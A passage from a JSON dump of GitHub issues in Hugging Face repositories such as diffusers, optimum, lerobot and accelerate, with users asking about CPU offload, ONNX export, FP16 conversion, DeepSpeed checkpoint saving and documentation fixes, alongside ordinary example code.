I mentioned Gradio specifically as command line inference will not have this problem unless after initializing pipe you generate multiple times with and without cpu offload.\r\n\r\nI already searched but nothing found\r\nhttps://github.com/search?q=repo%3Ahuggingface%2Fdiffusers%20disable_model_cpu_offload&type=code\r\n\r\n**Describe the solution you'd like.**\r\nAdd method to disable for \r\n1. enable_model_cpu_offload()\r\n2. enable_sequential_cpu_offload()\r\n\r\n**Describe alternatives you've considered.**\r\nI will have to delete the pipe completely and load again for each inference in Gradio UI\r\n\r\nKindly suggest if any alternative solution.\r\n\r\n\r\n```\r\nimport torch\r\nfrom diffusers import SanaPipeline\r\n\r\npipe = SanaPipeline.from_pretrained(\r\n\t\"Efficient-Large-Model/Sana_1600M_1024px_BF16_diffusers\", torch_dtype=torch.float32\r\n)\r\npipe.to(\"cuda\")\r\npipe.text_encoder.to(torch.bfloat16)\r\npipe.transformer = pipe.transformer.to(torch.bfloat16)\r\npipe.enable_model_cpu_offload()\r\n\r\nimage = pipe(prompt='a cyberpunk cat with a neon sign that says \"Sana\"')[0]\r\nimage[0].save(\"output.png\")\r\n\r\npipe.disable_model_cpu_offload()\r\nimage = pipe(prompt='a cyberpunk cat with a neon sign that says \"Sana 1\"')[0]\r\nimage[0].save(\"output1.png\")\r\n```\r\n\r\nP.S. How to delete a pipe completely so all models are removed completely and GPU memory is freed\r\nI did checked documentation but unable to find find anything relevant\r\nhttps://github.com/huggingface/diffusers/blob/main/src/diffusers/pipelines/sana/pipeline_sana.py\r\n\r\nhttps://github.com/huggingface/diffusers/blob/4e44534845d35248436abf87688906f52e71b868/src/diffusers/pipelines/pipeline_utils.py\r\n", "url": "https://github.com/huggingface/diffusers/issues/10452", "state": "closed", "labels": [], "created_at": "2025-01-04T16:39:01Z", "updated_at": "2025-01-07T08:29:32Z", "comments": 3, "user": "nitinmukesh" }, { "repo": "huggingface/diffusers", "number": 10448, "title": "Load DDUF file with Diffusers using mmap", "body": "DDUF support for diffusers is there and DDUF support mmap.\n\nBut diffusers example doesn't use or support mmap,\n\nHow can I load DDUF file to diffusers with mmap?\n\n```\nfrom diffusers import DiffusionPipeline\nimport torch\n\npipe = DiffusionPipeline.from_pretrained(\n \"DDUF/FLUX.1-dev-DDUF\", dduf_file=\"FLUX.1-dev.dduf\", torch_dtype=torch.bfloat16\n).to(\"cuda\")\nimage = pipe(\n \"photo a cat holding a sign that says Diffusers\", num_inference_steps=50, guidance_scale=3.5\n).images[0]\nimage.save(\"cat.png\")\n```", "url": "https://github.com/huggingface/diffusers/issues/10448", "state": "open", "labels": [ "stale" ], "created_at": "2025-01-04T00:42:09Z", "updated_at": "2025-02-03T15:02:46Z", "comments": 1, "user": "adhikjoshi" }, { "repo": "huggingface/lerobot", "number": 613, "title": "Starting off with pretrained models", "body": "Are there any pretrained models available that can be fine tuned using our own dataset for tasks like pick and place and manipulation? 
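On the P.S. in the diffusers request above (#10452) about deleting a pipeline completely: there is no dedicated `DiffusionPipeline` API for this that I'm aware of, but the standard PyTorch pattern below generally frees the memory, provided no other references to the pipeline or its components are kept alive. A sketch reusing the issue's own model:

```python
import gc
import torch
from diffusers import SanaPipeline

pipe = SanaPipeline.from_pretrained(
    "Efficient-Large-Model/Sana_1600M_1024px_BF16_diffusers",
    torch_dtype=torch.bfloat16,
).to("cuda")
image = pipe(prompt="a cyberpunk cat").images[0]

# Free GPU memory: drop every reference, then flush the allocator caches.
del pipe
gc.collect()                # collect the now-unreachable modules
torch.cuda.empty_cache()    # return cached blocks to the CUDA driver
torch.cuda.ipc_collect()
print(torch.cuda.memory_allocated())  # should be (near) zero again
```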
", "url": "https://github.com/huggingface/lerobot/issues/613", "state": "closed", "labels": [ "question", "stale" ], "created_at": "2025-01-03T21:09:40Z", "updated_at": "2025-10-08T20:53:09Z", "user": "rabhishek100" }, { "repo": "huggingface/optimum", "number": 2148, "title": "Support for Exporting Specific Sub-Modules (e.g., Encoder, Decoder)", "body": "### Feature request\n\nCurrently, when converting transformer models (like T5, but potentially others) to ONNX using the Optimum library, it appears to generate a single ONNX file encompassing the entire model architecture (both encoder and decoder). This occurs regardless of the specific task option selected during conversion.\r\n\r\n```\r\noptimum-cli export onnx --model . . --task text-classification\r\noptimum-cli export onnx --model . . --task feature-extraction \r\n```\r\nI propose a feature that provides users with more granular control over the ONNX export process. Specifically, this feature should allow users to selectively export specific sub-modules of a transformer model, such as:\r\n\r\n* Only the encoder\r\n* Only the decoder\r\n* Potentially other distinct components of the model\r\n\r\nThis enhancement would enable users to optimize ONNX models for specific use cases where only a portion of the full model is required. \r\nEvidence of the feasibility and need for this is the existence of separately exported encoder and decoder ONNX models for various transformer architectures on Hugging Face:\r\n- https://huggingface.co/dmmagdal/flan-t5-large-onnx-js/tree/main/onnx\r\n- https://huggingface.co/onnx-community/Florence-2-base-ft/tree/main/onnx\n\n### Motivation\n\nI am encountering a limitation with the current ONNX export functionality in Optimum. When converting transformer models, the resulting ONNX file invariably includes the entire model, even when I only require a specific part, like the encoder.\r\n\r\nThis is frustrating because:\r\n\r\n* **Increased Model Size:** The generated ONNX model is larger than necessary, consuming more storage and potentially impacting loading times.\r\n* **Performance Overhead:** When deploying the ONNX model for tasks that only utilize a specific sub-module (e.g., using only the encoder for embedding generation), the presence of the unnecessary decoder can introduce performance overhead.\r\n* **Lack of Flexibility:** The current approach lacks the flexibility to tailor the exported ONNX model to specific application needs.\r\n\r\nAs observed on Hugging Face, users have successfully exported individual components (like encoders and decoders) of various transformer models to ONNX. This indicates that it's technically possible and a desirable workflow. 
The Optimum library should provide a more direct and user-friendly way to achieve this without requiring manual workarounds.\n\n### Your contribution\n\nWhile my direct expertise in the internal workings of the Optimum library for ONNX export is limited, I am willing to contribute by:\r\n\r\n* **Testing:** Thoroughly testing any implementation of this feature on various transformer models.\r\n* **Providing Feedback:** Offering detailed feedback on the usability and effectiveness of the new feature.\r\n* **Sharing Use Cases:** Providing specific use cases and examples that highlight the benefits of this functionality.", "url": "https://github.com/huggingface/optimum/issues/2148", "state": "closed", "labels": [ "Stale" ], "created_at": "2025-01-03T14:48:36Z", "updated_at": "2025-04-08T02:09:03Z", "comments": 4, "user": "happyme531" }, { "repo": "huggingface/smolagents", "number": 52, "title": "How to implement human in the loop?", "body": "How to implement human in the loop?\r\n\r\nThere are two scenarios: one where more information and input from the user are required, and another where the user's consent is needed to perform a certain action.", "url": "https://github.com/huggingface/smolagents/issues/52", "state": "closed", "labels": [], "created_at": "2025-01-03T12:19:01Z", "updated_at": "2025-02-18T18:49:15Z", "user": "waderwu" }, { "repo": "huggingface/lerobot", "number": 611, "title": "Can ACT policy support pushT task?", "body": "I want to train the ACT policy with pushT dataset, but the evaluation accuracy is only 0%. \r\n![image](https://github.com/user-attachments/assets/12c4256a-98f9-4987-a1ab-b51ec230ba0b)\r\nHere is my yaml\r\n[act_pusht.txt](https://github.com/user-attachments/files/18299197/act_pusht.txt)\r\nAnd my training command is \r\n''\r\npython lerobot/scripts/train.py \\\r\n hydra.run.dir=outputs/train/2025_1_3_1654_act_pusht \\\r\n hydra.job.name=act_pusht \\\r\n policy=act_pusht \\\r\n policy.use_vae=true \\\r\n env=pusht \\\r\n env.task=PushT-v0 \\\r\n dataset_repo_id=lerobot/pusht \\\r\n training.offline_steps=50000 \\\r\n training.save_freq=25000 \\\r\n training.eval_freq=5000 \\\r\n eval.n_episodes=50 \\\r\n wandb.enable=false \\\r\n device=cuda\r\n''", "url": "https://github.com/huggingface/lerobot/issues/611", "state": "closed", "labels": [ "question", "policies", "stale" ], "created_at": "2025-01-03T11:30:40Z", "updated_at": "2025-10-19T02:32:28Z", "user": "Kimho666" }, { "repo": "huggingface/optimum", "number": 2147, "title": "Convert Stable Diffusion Inpainting model to FP16 with FP32 inputs", "body": "### Feature request\n\nI've used [this script](https://github.com/Amblyopius/Stable-Diffusion-ONNX-FP16/blob/main/conv_sd_to_onnx.py) to convert models to ONNX in FP16 format but maintaining the FP32 inputs. One of the models that I converted was [Stable Diffusion 2 Inpainting](https://huggingface.co/jdp8/sd-2-inpainting-fp16) to FP16 and tried to use it in ONNX Runtime and ONNX Runtime Web but it doesn't give me the expected results in either engine. I also converted [the model](https://huggingface.co/jdp8/optimum-sd-2-inpainting-onnx-fp32) with the Optimum conversion script to FP32 and this model gives me the expected result in ONNX Runtime. 
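Relevant to the conversion being described here: for FP16 weights behind FP32 inputs/outputs (so JavaScript callers can keep using `Float32Array`), the `keep_io_types` flag in `onnxconverter-common` is one standard route. A sketch assuming an existing FP32 export at a hypothetical `model.onnx` path:

```python
import onnx
from onnxconverter_common import float16

model = onnx.load("model.onnx")  # hypothetical path to the FP32 export
# Cast weights/ops to FP16 but insert Cast nodes so the graph's inputs
# and outputs stay FP32.
model_fp16 = float16.convert_float_to_float16(model, keep_io_types=True)
onnx.save(model_fp16, "model_fp16.onnx")
```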
Results are shown below:\r\n\r\nInput Image:\r\n![inpaint](https://github.com/user-attachments/assets/751999a8-3814-40b9-a767-3717e9ea4b3e)\r\n\r\nMask Image:\r\n![inpaint_mask](https://github.com/user-attachments/assets/e421ca3b-0e0e-4050-b497-390abb399880)\r\n\r\nCorrect Onnx Runtime Output (converted with Optimum script):\r\n![onnx_cat](https://github.com/user-attachments/assets/48f4c713-5bae-42c5-ba2a-252655aca443)\r\n\r\nIncorrect Onnx Runtime Output (converted with Stable-Diffusion-ONNX-FP16 script):\r\n![onnx_cat_discolored](https://github.com/user-attachments/assets/f6c521d7-9f29-4bc9-88c6-297b4432e2f0)\r\n\r\nIncorrect Onnx Runtime Web Output (converted with Stable-Diffusion-ONNX-FP16 script):\r\n![Colorful_cat_picture](https://github.com/user-attachments/assets/2f8dcb2b-a4ba-450b-9761-2fac0da0f58c)\r\n\r\nI've also used the Optimum conversion script to convert the model to FP16 and this worked but the inputs are expected to be FP16. This datatype does not exist in JavaScript (specifically, `Float16Array`) and therefore cannot be used in ONNX Runtime Web. \r\n\r\nWith that being said, is it possible to convert a model to FP16 but leaving the inputs as FP32 in order for the UNET to be less than 2 GB?\n\n### Motivation\n\nI would like to run Stable Diffusion Inpainting in ONNX Runtime Web and for the UNET to be less than 2GB. The FP16 model that I have at the moment gives me an output that is not as expected in ONNX Runtime and ONNX Runtime Web. So far, only the Optimum models give me a correct output in ONNX Runtime but I would like to use this in ONNX Runtime Web.\n\n### Your contribution\n\nI am willing to contribute to this change given some guidance. Not sure how difficult it would be but I believe it would be similar to how it's implemented in [the script](https://github.com/Amblyopius/Stable-Diffusion-ONNX-FP16/blob/main/conv_sd_to_onnx.py) mentioned beforehand.", "url": "https://github.com/huggingface/optimum/issues/2147", "state": "closed", "labels": [], "created_at": "2025-01-02T21:28:43Z", "updated_at": "2025-01-25T00:15:54Z", "comments": 0, "user": "jdp8" }, { "repo": "huggingface/diffusers", "number": 10433, "title": "[Docs] Broken Links in a Section of Documentation", "body": "### Broken Links in a Section of Documentation\r\n>Make sure to check out the Schedulers [guide](../../using-diffusers/schedulers) to learn how to explore the tradeoff between scheduler speed and quality, and see the [reuse components across pipelines](../../using-diffusers/loading#reuse-a-pipeline) section to learn how to efficiently load the same components into multiple pipelines.\r\n\r\nIn this section of docs `reuse components across pipelines` link is broken or Not Directed to Proper Link\r\n\r\n`reuse components across pipelines` should be directed to [Reuse a pipeline](https://huggingface.co/docs/diffusers/en/using-diffusers/loading#reuse-a-pipeline) this section instead of [Load pipelines](https://huggingface.co/docs/diffusers/en/using-diffusers/loading#reuse-components-across-pipelines) section in following File.\r\n
\r\nIn these docs:\r\ndocs/source/en/api/pipelines/animatediff.md\r\ndocs/source/en/api/pipelines/attend_and_excite.md\r\ndocs/source/en/api/pipelines/audioldm.md\r\ndocs/source/en/api/pipelines/audioldm2.md\r\ndocs/source/en/api/pipelines/blip_diffusion.md\r\ndocs/source/en/api/pipelines/controlnet.md\r\ndocs/source/en/api/pipelines/controlnet_flux.md\r\ndocs/source/en/api/pipelines/controlnet_hunyuandit.md\r\ndocs/source/en/api/pipelines/controlnet_sd3.md\r\ndocs/source/en/api/pipelines/controlnet_sdxl.md\r\ndocs/source/en/api/pipelines/controlnetxs.md\r\ndocs/source/en/api/pipelines/controlnetxs_sdxl.md\r\ndocs/source/en/api/pipelines/dance_diffusion.md\r\ndocs/source/en/api/pipelines/ddpm.md\r\ndocs/source/en/api/pipelines/dit.md\r\ndocs/source/en/api/pipelines/i2vgenxl.md\r\ndocs/source/en/api/pipelines/kandinsky.md\r\ndocs/source/en/api/pipelines/kandinsky3.md\r\ndocs/source/en/api/pipelines/kandinsky_v22.md\r\ndocs/source/en/api/pipelines/latent_diffusion.md\r\ndocs/source/en/api/pipelines/marigold.md\r\ndocs/source/en/api/pipelines/musicldm.md\r\ndocs/source/en/api/pipelines/paint_by_example.md\r\ndocs/source/en/api/pipelines/panorama.md\r\ndocs/source/en/api/pipelines/pix2pix.md\r\ndocs/source/en/api/pipelines/self_attention_guidance.md\r\ndocs/source/en/api/pipelines/semantic_stable_diffusion.md\r\ndocs/source/en/api/pipelines/shap_e.md\r\ndocs/source/en/api/pipelines/stable_unclip.md\r\ndocs/source/en/api/pipelines/text_to_video.md\r\ndocs/source/en/api/pipelines/text_to_video_zero.md\r\ndocs/source/en/api/pipelines/unclip.md\r\ndocs/source/en/api/pipelines/unidiffuser.md\r\ndocs/source/en/api/pipelines/value_guided_sampling.md\r\n\r\n---\r\n\r\nSome `reuse components across pipelines` links are also broken in the files below.\r\n\r\nIn these docs:\r\ndocs/source/en/api/pipelines/allegro.md\r\ndocs/source/en/api/pipelines/cogvideox.md\r\ndocs/source/en/api/pipelines/latte.md\r\ndocs/source/en/api/pipelines/ltx_video.md\r\ndocs/source/en/api/pipelines/lumina.md\r\ndocs/source/en/api/pipelines/pixart.md\r\ndocs/source/en/api/pipelines/sana.md\r\n
\r\n\r\n\r\n---\r\n\r\n\r\n And `docs/source/en/api/pipelines/hunyuan_video.md` and `docs/source/en/api/pipelines/hunyuandit.md` are not in proper format\r\n@stevhliu ", "url": "https://github.com/huggingface/diffusers/issues/10433", "state": "closed", "labels": [], "created_at": "2025-01-02T18:24:44Z", "updated_at": "2025-01-06T18:07:39Z", "comments": 0, "user": "SahilCarterr" }, { "repo": "huggingface/transformers", "number": 35485, "title": " How to run the model on another machine and send the answer to another machine.", "body": "### System Info\n\ntransformers 4.31.0 , window os , python 3.10.12\n\n### Who can help?\n\nvision models: @amyeroberts, @qubvel\r\n\r\nI have tried using this model on my machine myself, and it works normally, but the processing is very slow because the GPU on my machine is not that powerful. However, I have a server with a strong GPU. If I install this model on the server and run the code on my machine, when it reaches the video processing stage, it sends the task to the server, and the server sends back the result. Then my machine will print the answer and display the result. Is this possible? If so, how can I do it?\r\n\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\n.\n\n### Expected behavior\n\nI expect it to work in a hybrid way between my computer and the server to achieve faster results.", "url": "https://github.com/huggingface/transformers/issues/35485", "state": "closed", "labels": [ "bug" ], "created_at": "2025-01-02T10:03:42Z", "updated_at": "2025-01-07T10:20:46Z", "user": "ixn3rd3mxn" }, { "repo": "huggingface/accelerate", "number": 3320, "title": "How to save self-defined model with deepspeed zero 3?", "body": "### System Info\r\n\r\n```Shell\r\n- `Accelerate` version: 1.0.1\r\n- Python version: 3.10.0\r\n- Numpy version: 1.26.4\r\n- PyTorch version (GPU?): 2.5.1+cu124 (True)\r\n- PyTorch XPU available: False\r\n- PyTorch NPU available: False\r\n- PyTorch MLU available: False\r\n- PyTorch MUSA available: False\r\n- System RAM: 128.00 GB\r\n- GPU type: NVIDIA H20\r\n- `Accelerate` default config:\r\n - compute_environment: LOCAL_MACHINE\r\n - distributed_type: DEEPSPEED\r\n - mixed_precision: no\r\n - use_cpu: False\r\n - debug: False\r\n - num_processes: 4\r\n - machine_rank: 0\r\n - num_machines: 1\r\n - rdzv_backend: static\r\n - same_network: True\r\n - main_training_function: main\r\n - enable_cpu_affinity: False\r\n - deepspeed_config: {'gradient_accumulation_steps': 1, 'offload_optimizer_device': 'none', 'offload_param_device': 'none', 'zero3_init_flag': True, 'zero3_save_16bit_model': True, 'zero_stage': 3} \r\n - downcast_bf16: no\r\n - tpu_use_cluster: False\r\n - tpu_use_sudo: False\r\n - tpu_env: []\r\n```\r\n\r\n\r\n### Information\r\n\r\n- [ ] The official example scripts\r\n- [X] My own modified scripts\r\n\r\n### Tasks\r\n\r\n- [ ] One of the scripts in the examples/ folder of Accelerate or an officially supported `no_trainer` script in the `examples` folder of the `transformers` repo (such as `run_no_trainer_glue.py`)\r\n- [X] My own task or dataset (give details below)\r\n\r\n### Reproduction\r\n\r\nMy custom model inherits from torch.nn.Module.\r\nI am training this model with 4 H20 GPUs using deepspeed zero 3.\r\nI am trying to save a checkpoint with these code:\r\n`\r\n### save model\r\n if (idx % 
args.save_per_steps == 0) and (idx != 0):\r\n accelerator.wait_for_everyone()\r\n if (accelerator.is_local_main_process):\r\n accelerator.print('Saving model ...')\r\n save_dir = os.path.join(args.save_path, args.save_name + '_epoch_' + str(epoch) + '_step_' + str(idx))\r\n accelerator.print('Getting state dict ...')\r\n state_dict = accelerator.get_state_dict(model)\r\n accelerator.print('Unwraping model ...')\r\n unwrapped_model = accelerator.unwrap_model(model)\r\n accelerator.print('Saving checkpoint ...')\r\n unwrapped_model.save_checkpoint(save_dir, idx, state_dict)\r\n accelerator.print('Model saved!')\r\n accelerator.wait_for_everyone()\r\n`\r\n\r\n\r\n### Expected behavior\r\n\r\nThe code stuck when getting state dict.\r\nI also tried `accelerator.save_model` but it couldn't work.\r\n\r\nI am wondering what's the recommend\u200c way to save and load a large model training with deepspeed zero 3?\r\nThank you very much.", "url": "https://github.com/huggingface/accelerate/issues/3320", "state": "closed", "labels": [], "created_at": "2025-01-02T08:15:36Z", "updated_at": "2025-02-10T15:07:18Z", "user": "amoyplane" }, { "repo": "huggingface/diffusers", "number": 10425, "title": "Euler Flow Matching Scheduler Missing Documentation for Parameters", "body": "### Describe the bug\n\nThe Euler flow matching scheduler in Hugging Face Diffusers is missing clear documentation for its parameters, making it difficult for users to understand how to configure the scheduler effectively for different use cases.\n\n### Reproduction\n\nSteps to Reproduce:\r\n\r\nVisit the Hugging Face Diffusers documentation page and locate the section for the Euler flow matching scheduler.\r\nTry to find documentation for the scheduler\u2019s parameters.\r\nNotice that the documentation does not clearly define the parameters or explain their effects.\n\n### Logs\n\n_No response_\n\n### System Info\n\nHugging Face Diffusers version: 0.16.1\r\nPyTorch version: 2.1.0\r\nCUDA version: 11.8\r\nCPU: Intel Core i7-12700K\r\nGPU: NVIDIA RTX 3090\n\n### Who can help?\n\n@sayakpaul @DN6", "url": "https://github.com/huggingface/diffusers/issues/10425", "state": "closed", "labels": [ "bug" ], "created_at": "2025-01-02T01:37:38Z", "updated_at": "2025-01-02T01:38:38Z", "comments": 0, "user": "hanshengzhu0001" }, { "repo": "huggingface/transformers.js", "number": 1130, "title": "Tips on Converting Newer Models", "body": "### Question\n\n\ud83c\udf89\ud83c\udf89Happy New Year to the incredible Transformers.js team!\ud83c\udf89\ud83c\udf89\r\n\r\nAs I work on converting new (text-generation) models for use with Transformers.js.\r\nHere's what i've tried since last week :\r\n\r\n* python converter script \r\n* optimum cli onnx\r\n* onnx-community/convert-to-onnx spaces\r\n\r\nthe problem i encounter as i move forward to newer models, i realize that the converter is looking for specific files like the ff below which is easy to convert both locally and online:\r\n![image](https://github.com/user-attachments/assets/bdb031eb-c87a-4e1a-b895-7608b94699d0)\r\n\r\nwhile some newer models consist files like of the ff below which i couldn't convert:\r\n![image](https://github.com/user-attachments/assets/01058d6a-f232-4ed5-87fe-2df82b346025)\r\n\r\ni have no problem with pc specs at all, i maybe missing some steps, rules or understanding converting models. 
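Returning to the ZeRO-3 saving question above (huggingface/accelerate#3320): the hang in `get_state_dict` is consistent with calling it from only one rank, since under ZeRO-3 the gather of sharded parameters is a collective operation that every rank must join. A hedged sketch of the commonly recommended pattern (the tiny Linear model is a stand-in for the custom model):

```python
import os
import torch
from accelerate import Accelerator

accelerator = Accelerator()
model = accelerator.prepare(torch.nn.Linear(8, 8))  # stand-in model
save_dir = "checkpoints"

accelerator.wait_for_everyone()
# Collective under ZeRO-3: ALL ranks must call this, so do not guard it
# with is_local_main_process as in the snippet above.
state_dict = accelerator.get_state_dict(model)
if accelerator.is_main_process:
    os.makedirs(save_dir, exist_ok=True)
    torch.save(state_dict, os.path.join(save_dir, "pytorch_model.bin"))
accelerator.wait_for_everyone()
```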
I\u2019d greatly appreciate any tips, best practices, or resources you could share to streamline the process and ensure compatibility.\r\n\r\nMuch Appreciated!\r\n", "url": "https://github.com/huggingface/transformers.js/issues/1130", "state": "open", "labels": [ "question" ], "created_at": "2025-01-01T05:32:09Z", "updated_at": "2025-01-01T05:32:09Z", "user": "josephencila" }, { "repo": "huggingface/lerobot", "number": 606, "title": "Dataset does not support length of feature shape > 1", "body": "Hi, \r\n\r\nThank you for this excellent project!\r\nI am trying to create a custom dataset with additional sensory information (such as tactile data) which is an Array3D tensor, but find that when I use the approach mentioned in #547, there is no support to add custom tensor like observations to the episode buffer. \r\n\r\nSpecifically there are assertions that require the feature shape to be a 1D array at most [here](https://github.com/huggingface/lerobot/blob/59e275743499c5811a9f651a8947e8f881c4058c/lerobot/common/datasets/utils.py#L274)", "url": "https://github.com/huggingface/lerobot/issues/606", "state": "closed", "labels": [ "question", "dataset", "stale" ], "created_at": "2024-12-31T21:08:26Z", "updated_at": "2025-10-19T02:32:29Z", "user": "akashsharma02" }, { "repo": "huggingface/finetrainers", "number": 169, "title": "How to build a dataset for finetuning CogVideoX I2V 1.5", "body": "Hi,\r\nI want to finetune the CogVideoX I2V 1.5 (5B) model. I have a set of videos that I want to use, but first I need to preprocess them so they meet the requirements of the model. Do I have to make sure that my fine-tuning dataset meets the generation properties of the model? That is, in the case of CogVideoX 1.5, the videos should be:\r\n\r\n- Min(W, H) = 768\r\n- 768 \u2264 Max(W, H) \u2264 1360\r\n- Max(W, H) % 16 = 0\r\n- Video Length: 5 seconds or 10 seconds\r\n- Frame Rate: 16 frames / second\r\n\r\nDo I need to make sure that all my fine-tuning videos follow those guidelines?", "url": "https://github.com/huggingface/finetrainers/issues/169", "state": "closed", "labels": [], "created_at": "2024-12-31T19:55:00Z", "updated_at": "2025-03-08T23:43:31Z", "user": "royvelich" }, { "repo": "huggingface/diffusers", "number": 10416, "title": "Euler flow matching scheduler is missing documentation for parameters", "body": "![image](https://github.com/user-attachments/assets/ecd16c04-8f31-42fc-9f30-e660cf4f5853)\r\n\r\nI think there are some undocumented parameters here.", "url": "https://github.com/huggingface/diffusers/issues/10416", "state": "closed", "labels": [], "created_at": "2024-12-31T13:15:35Z", "updated_at": "2025-01-09T18:54:41Z", "comments": 4, "user": "bghira" }, { "repo": "huggingface/chat-ui", "number": 1636, "title": "Any way to pass authorization header from Oauth2 down to custom endpoint?", "body": "## Describe your feature request\r\n\r\nIt would be nice to be able to pass the authorization header from Oauth2 to custom endpoint. I have an endpoint that mimicks TGI and I would like to authenticate every request in order to protect the api,\r\n\r\n## Implementation idea\r\n\r\nJust pass an authorization header from frontend to bff and pass it further to the endpoint. It could be a custom header if that would conflict with the current authorization configuration for endpoints. 
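Since the requirements quoted in the finetrainers question above (#169) are easy to get wrong when batch-filtering clips, here is a tiny validator that simply transcribes that bullet list into code; whether CogVideoX 1.5 strictly enforces each constraint is exactly what the issue asks, so treat these checks as the issue's stated assumptions:

```python
def meets_cogvideox_15_constraints(width: int, height: int,
                                   n_frames: int, fps: float) -> bool:
    """Check one clip against the constraints listed in finetrainers#169."""
    return (
        min(width, height) == 768                  # Min(W, H) = 768
        and 768 <= max(width, height) <= 1360      # 768 <= Max(W, H) <= 1360
        and max(width, height) % 16 == 0           # Max(W, H) % 16 = 0
        and fps == 16                              # 16 frames / second
        and n_frames / fps in (5.0, 10.0)          # 5 or 10 seconds
    )

print(meets_cogvideox_15_constraints(1360, 768, 160, 16))  # True
print(meets_cogvideox_15_constraints(1280, 720, 160, 16))  # False: short side != 768
```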
The current configuration allows to pass a static auth header, but I want to be able to pass the jwt of the authenticated user.", "url": "https://github.com/huggingface/chat-ui/issues/1636", "state": "open", "labels": [ "enhancement" ], "created_at": "2024-12-31T13:00:22Z", "updated_at": "2024-12-31T13:00:22Z", "comments": 0, "user": "corte" }, { "repo": "huggingface/diffusers", "number": 10415, "title": "[Pipelines] Add AttentiveEraser", "body": "### Model/Pipeline/Scheduler description\r\n\r\nI\u2019ve worked on a project called AttentiveEraser, which is a tuning-free method for object removal in images using diffusion models. The code for this project is built upon modifications to existing Diffusers pipelines, so it should be relatively straightforward to integrate it into the library.\r\n## About AttentiveEraser\r\nAttentiveEraser enhances object removal capabilities by using self-attention redirection guidance. It supports different levels of mask precision (semantic segmentation, bounding boxes, and hand-drawn masks) and effectively fills in removed regions by leveraging the generative power of diffusion models.\r\n## Help Needed\r\nAs someone new to this process, I\u2019m unsure how to properly package this into a Diffusers pipeline. Is anyone interested in collaborating on this integration or able to provide guidance on the steps I should take next?\r\nI\u2019d love to contribute this feature to the community, and the relevant code is already available!\r\nCode: \r\nLooking forward to any suggestions or assistance!\r\n![fenmian](https://github.com/user-attachments/assets/6c21a68a-be14-437c-89db-a2059557b7a9)\r\n\r\n\r\n\r\n\r\n### Open source status\r\n\r\n- [X] The model implementation is available.\r\n- [X] The model weights are available (Only relevant if addition is not a scheduler).\r\n\r\n### Provide useful links for the implementation\r\n\r\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/10415", "state": "closed", "labels": [ "stale" ], "created_at": "2024-12-31T07:44:48Z", "updated_at": "2025-02-05T15:54:43Z", "comments": 7, "user": "Anonym0u3" }, { "repo": "huggingface/diffusers", "number": 10414, "title": "[] Translating docs to Chinese", "body": "\r\n\r\nHi!\r\n\r\nLet's bring the documentation to all the -speaking community \ud83c\udf10.\r\n\r\nWho would want to translate? Please follow the \ud83e\udd17 [TRANSLATING guide](https://github.com/huggingface/diffusers/blob/main/docs/TRANSLATING.md). Here is a list of the files ready for translation. Let us know in this issue if you'd like to translate any, and we'll add your name to the list.\r\n\r\nSome notes:\r\n\r\n* Please translate using an informal tone (imagine you are talking with a friend about Diffusers \ud83e\udd17).\r\n* Please translate in a gender-neutral way.\r\n* Add your translations to the folder called `` inside the [source folder](https://github.com/huggingface/diffusers/tree/main/docs/source).\r\n* Register your translation in `/_toctree.yml`; please follow the order of the [English version](https://github.com/huggingface/diffusers/blob/main/docs/source/en/_toctree.yml).\r\n* Once you're finished, open a pull request and tag this issue by including #issue-number in the description, where issue-number is the number of this issue. 
Please ping @stevhliu for review.\r\n* \ud83d\ude4b If you'd like others to help you with the translation, you can also post in the \ud83e\udd17 [forums](https://discuss.huggingface.co/c/discussion-related-to-httpsgithubcomhuggingfacediffusers/63).\r\n\r\nThank you so much for your help! \ud83e\udd17\r\n", "url": "https://github.com/huggingface/diffusers/issues/10414", "state": "closed", "labels": [], "created_at": "2024-12-31T06:45:21Z", "updated_at": "2024-12-31T06:49:52Z", "comments": 0, "user": "S20180576" }, { "repo": "huggingface/peft", "number": 2301, "title": "How to pass in an attention_mask that has one more dimension than input_ids", "body": "### System Info\n\nHello, how can I pass in an `attention_mask` that has one more dimension than `input_ids`, for example: `output = peft_model.generate(input_ids,attention_mask=attention_mask,max_new_tokens=100)`? The `input_ids` dimension is [batch_size, N], and the `attention_mask` dimension is [batch_size, N, N]. \r\nUnder this condition, when the above line of code is run, the following error is reported: \r\nFile \"/root/anaconda3/lib/python3.10/site-packages/transformers/modeling_attn_mask_utils.py\", line 179, in _expand_mask bsz, src_len = mask.size() \r\nValueError: too many values to unpack (expected 2)\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [X] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder\n- [X] My own task or dataset (give details below)\n\n### Reproduction\n\n```python\r\ninput_ids = torch.cat([\r\n    (torch.ones(input_ids.shape[0], 1) * uni_prompting.sptids_dict['<|mmu|>']).to(device),\r\n    (torch.ones(input_ids.shape[0], 1) * uni_prompting.sptids_dict['<|soi|>']).to(device),\r\n    image_tokens,\r\n    (torch.ones(input_ids.shape[0], 1) * uni_prompting.sptids_dict['<|eoi|>']).to(device),\r\n    (torch.ones(input_ids.shape[0], 1) * uni_prompting.sptids_dict['<|sot|>']).to(device),\r\n    input_ids\r\n], dim=1).long()\r\n\r\nattention_mask = create_attention_mask_for_mmu(input_ids.to(device),\r\n                                               eoi_id=int(uni_prompting.sptids_dict['<|eoi|>']))\r\ncont_toks_list = peft_model.generate(input_ids, attention_mask=attention_mask, max_new_tokens=100)\r\n```\n\n### Expected behavior\n\nLoad the model for fine-tuning and inference.", "url": "https://github.com/huggingface/peft/issues/2301", "state": "closed", "labels": [], "created_at": "2024-12-31T02:26:14Z", "updated_at": "2025-02-07T15:03:57Z", "user": "Chinesehou97" }, { "repo": "huggingface/diffusers", "number": 10411, "title": "How to use the trained LoRA weights obtained from examples/consistency_distillation/train_lcm_distill_lora_sd_wds.py", "body": "I followed the tutorial provided at https://github.com/huggingface/diffusers/tree/main/examples/consistency_distillation and trained the final LoRA weights, but did not find a way to load them. May I ask if you can provide me with a demo of running and calling these weights?
